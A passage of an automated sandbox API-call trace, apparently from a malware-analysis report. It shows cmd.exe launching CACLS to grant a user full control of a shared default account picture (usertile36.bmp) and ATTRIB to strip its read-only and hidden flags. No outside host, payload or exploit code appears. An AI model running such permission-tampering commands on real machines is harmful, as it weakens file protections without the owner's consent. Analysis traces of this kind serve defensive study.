_String2="CMDEXTVERSION") returned 13 [0188.612] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0188.612] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0188.612] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0188.612] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0188.612] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0188.612] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0188.612] GetEnvironmentStringsW () returned 0x302458* [0188.612] FreeEnvironmentStringsW (penv=0x302458) returned 1 [0188.612] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0188.612] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0188.612] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0188.612] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0188.612] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0188.612] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0188.612] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0188.612] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0188.612] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0188.612] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0188.612] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1af758 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0188.612] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1af758, lpFilePart=0x1af754 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1af754*="Desktop") returned 0x18 [0188.612] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0188.613] FindFirstFileW (in: 
lpFileName="C:\\Users", lpFindFileData=0x1af4d4 | out: lpFindFileData=0x1af4d4) returned 0x300ae8 [0188.613] FindClose (in: hFindFile=0x300ae8 | out: hFindFile=0x300ae8) returned 1 [0188.613] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1af4d4 | out: lpFindFileData=0x1af4d4) returned 0x300ae8 [0188.613] FindClose (in: hFindFile=0x300ae8 | out: hFindFile=0x300ae8) returned 1 [0188.613] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1af4d4 | out: lpFindFileData=0x1af4d4) returned 0x300ae8 [0188.613] FindClose (in: hFindFile=0x300ae8 | out: hFindFile=0x300ae8) returned 1 [0188.613] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0188.613] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0188.613] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0188.613] GetEnvironmentStringsW () returned 0x300308* [0188.613] FreeEnvironmentStringsW (penv=0x300308) returned 1 [0188.613] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0188.614] GetConsoleOutputCP () returned 0x1b5 [0188.614] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0188.614] GetUserDefaultLCID () returned 0x409 [0188.614] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0188.614] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1af898, cchData=128 | out: lpLCData="0") returned 2 [0188.614] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1af898, cchData=128 | out: lpLCData="0") returned 2 [0188.614] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1af898, cchData=128 | out: lpLCData="1") returned 2 [0188.614] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, 
lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0188.614] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0188.615] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0188.615] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0188.615] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0188.615] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0188.615] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0188.615] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0188.615] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0188.615] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0188.615] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0188.616] GetConsoleTitleW (in: lpConsoleTitle=0x2f09b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0188.616] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0188.616] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0188.616] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0188.616] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0188.617] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0188.617] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0188.617] _wcsicmp 
(_String1="FOR", _String2="CACLS") returned 3 [0188.617] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0188.617] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0188.617] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0188.617] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0188.617] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0188.620] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0188.620] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0188.620] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0188.620] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0188.620] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0188.620] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0188.620] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0188.622] GetConsoleTitleW (in: lpConsoleTitle=0x1af52c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0188.622] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0188.622] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0188.622] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0188.622] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0188.622] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0188.622] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0188.622] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0188.622] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0188.622] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0188.622] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0188.622] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0188.622] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0188.622] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0188.622] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0188.622] _wcsicmp (_String1="CACLS", 
_String2="PROMPT") returned -13 [0188.622] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0188.622] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0188.622] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0188.622] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0188.622] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0188.622] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0188.622] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0188.622] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0188.622] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0188.622] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0188.622] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0188.622] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0188.622] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0188.622] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0188.622] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0188.623] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0188.623] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0188.623] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0188.623] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0188.623] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0188.623] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0188.623] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0188.623] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0188.623] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0188.623] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0188.623] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0188.623] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0188.623] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0188.623] _wcsicmp 
(_String1="CACLS", _String2="ERASE") returned -2 [0188.623] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0188.623] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0188.623] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0188.623] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0188.623] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0188.623] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0188.623] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0188.623] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0188.623] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0188.623] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0188.623] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0188.623] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0188.623] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0188.623] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0188.623] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0188.623] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0188.623] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0188.623] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0188.623] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0188.623] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0188.623] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0188.623] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0188.623] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0188.623] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0188.623] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0188.623] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0188.623] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0188.623] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0188.623] _wcsicmp 
(_String1="CACLS", _String2="TITLE") returned -17 [0188.623] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0188.623] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0188.623] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0188.623] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0188.623] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0188.623] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0188.623] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0188.624] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0188.624] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0188.624] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0188.624] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0188.624] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0188.624] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0188.624] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0188.624] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0188.624] SetErrorMode (uMode=0x0) returned 0x0 [0188.624] SetErrorMode (uMode=0x1) returned 0x0 [0188.624] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x301e98, lpFilePart=0x1af04c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1af04c*="Desktop") returned 0x18 [0188.624] SetErrorMode (uMode=0x0) returned 0x1 [0188.624] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0188.625] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0188.654] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0188.654] FindFirstFileExW (in: 
lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x1aedc8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aedc8) returned 0xffffffff [0188.655] GetLastError () returned 0x2 [0188.655] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x1aedc8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aedc8) returned 0xffffffff [0188.655] GetLastError () returned 0x2 [0188.655] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x1aedc8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aedc8) returned 0x302180 [0188.655] FindClose (in: hFindFile=0x302180 | out: hFindFile=0x302180) returned 1 [0188.655] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x1aedc8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aedc8) returned 0xffffffff [0188.655] GetLastError () returned 0x2 [0188.655] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x1aedc8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aedc8) returned 0x302180 [0188.655] FindClose (in: hFindFile=0x302180 | out: hFindFile=0x302180) returned 1 [0188.655] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0188.655] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0188.655] GetConsoleTitleW (in: lpConsoleTitle=0x1af2c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0188.656] InitializeProcThreadAttributeList (in: lpAttributeList=0x1af148, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1af210 | out: lpAttributeList=0x1af148, lpSize=0x1af210) returned 1 [0188.656] UpdateProcThreadAttribute (in: lpAttributeList=0x1af148, dwFlags=0x0, Attribute=0x60001, lpValue=0x1af208, 
cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1af148, lpPreviousValue=0x0) returned 1 [0188.656] GetStartupInfoW (in: lpStartupInfo=0x1af104 | out: lpStartupInfo=0x1af104*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0188.656] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0188.657] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x1af1a4*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1af1f0 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x1af1f0*(hProcess=0x50, hThread=0x4c, dwProcessId=0x7dc, dwThreadId=0x8a0)) returned 1 [0188.659] CloseHandle (hObject=0x4c) returned 1 [0188.659] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0188.659] GetEnvironmentStringsW () returned 0x300308* [0188.659] FreeEnvironmentStringsW (penv=0x300308) returned 1 [0188.659] WaitForSingleObject (hHandle=0x50, 
dwMilliseconds=0xffffffff) returned 0x0 [0188.847] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x1af0e4 | out: lpExitCode=0x1af0e4*=0x0) returned 1 [0188.847] CloseHandle (hObject=0x50) returned 1 [0188.847] _vsnwprintf (in: _Buffer=0x1af22c, _BufferCount=0x13, _Format="%08X", _ArgList=0x1af0f0 | out: _Buffer="00000000") returned 8 [0188.847] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0188.848] GetEnvironmentStringsW () returned 0x302410* [0188.848] FreeEnvironmentStringsW (penv=0x302410) returned 1 [0188.848] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0188.848] GetEnvironmentStringsW () returned 0x302410* [0188.848] FreeEnvironmentStringsW (penv=0x302410) returned 1 [0188.848] DeleteProcThreadAttributeList (in: lpAttributeList=0x1af148 | out: lpAttributeList=0x1af148) [0188.848] GetConsoleTitleW (in: lpConsoleTitle=0x1af52c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0188.848] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0188.848] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0188.848] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0188.848] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x1aedc8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aedc8) returned 0xffffffff [0188.849] GetLastError () returned 0x2 [0188.849] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x1aedc8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aedc8) returned 0xffffffff [0188.849] 
GetLastError () returned 0x2 [0188.849] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x1aedc8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aedc8) returned 0x2fe4d8 [0188.849] FindClose (in: hFindFile=0x2fe4d8 | out: hFindFile=0x2fe4d8) returned 1 [0188.849] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x1aedc8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aedc8) returned 0xffffffff [0188.849] GetLastError () returned 0x2 [0188.849] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x1aedc8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aedc8) returned 0x2fe4d8 [0188.849] FindClose (in: hFindFile=0x2fe4d8 | out: hFindFile=0x2fe4d8) returned 1 [0188.849] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0188.849] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0188.849] GetConsoleTitleW (in: lpConsoleTitle=0x1af2c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0188.849] InitializeProcThreadAttributeList (in: lpAttributeList=0x1af148, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1af210 | out: lpAttributeList=0x1af148, lpSize=0x1af210) returned 1 [0188.849] UpdateProcThreadAttribute (in: lpAttributeList=0x1af148, dwFlags=0x0, Attribute=0x60001, lpValue=0x1af208, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1af148, lpPreviousValue=0x0) returned 1 [0188.850] GetStartupInfoW (in: lpStartupInfo=0x1af104 | out: lpStartupInfo=0x1af104*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, 
hStdOutput=0x0, hStdError=0x1000000)) [0188.850] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0188.850] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x1af1a4*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1af1f0 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp\"", lpProcessInformation=0x1af1f0*(hProcess=0x4c, hThread=0x50, dwProcessId=0x8cc, dwThreadId=0x83c)) returned 1 [0188.851] CloseHandle (hObject=0x50) returned 1 [0188.851] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0188.851] GetEnvironmentStringsW () returned 0x302410* [0188.851] FreeEnvironmentStringsW (penv=0x302410) returned 1 [0188.851] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0189.082] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x1af0e4 | out: lpExitCode=0x1af0e4*=0x0) returned 1 [0189.082] CloseHandle (hObject=0x4c) returned 1 [0189.082] _vsnwprintf (in: _Buffer=0x1af22c, _BufferCount=0x13, _Format="%08X", _ArgList=0x1af0f0 | out: _Buffer="00000000") returned 8 [0189.082] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0189.082] GetEnvironmentStringsW () returned 0x302410* [0189.082] FreeEnvironmentStringsW 
(penv=0x302410) returned 1 [0189.082] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0189.082] GetEnvironmentStringsW () returned 0x302410* [0189.082] FreeEnvironmentStringsW (penv=0x302410) returned 1 [0189.082] DeleteProcThreadAttributeList (in: lpAttributeList=0x1af148 | out: lpAttributeList=0x1af148) [0189.082] _get_osfhandle (_FileHandle=1) returned 0x7 [0189.082] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0189.083] _get_osfhandle (_FileHandle=1) returned 0x7 [0189.083] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0189.083] _get_osfhandle (_FileHandle=0) returned 0x3 [0189.083] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0189.083] SetConsoleInputExeNameW () returned 0x1 [0189.083] GetConsoleOutputCP () returned 0x1b5 [0189.083] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0189.083] SetThreadUILanguage (LangId=0x0) returned 0x409 [0189.083] exit (_Code=0) Process: id = "407" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea16d80" os_pid = "0x7dc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "406" os_parent_pid = "0x9c8" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 27440 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 
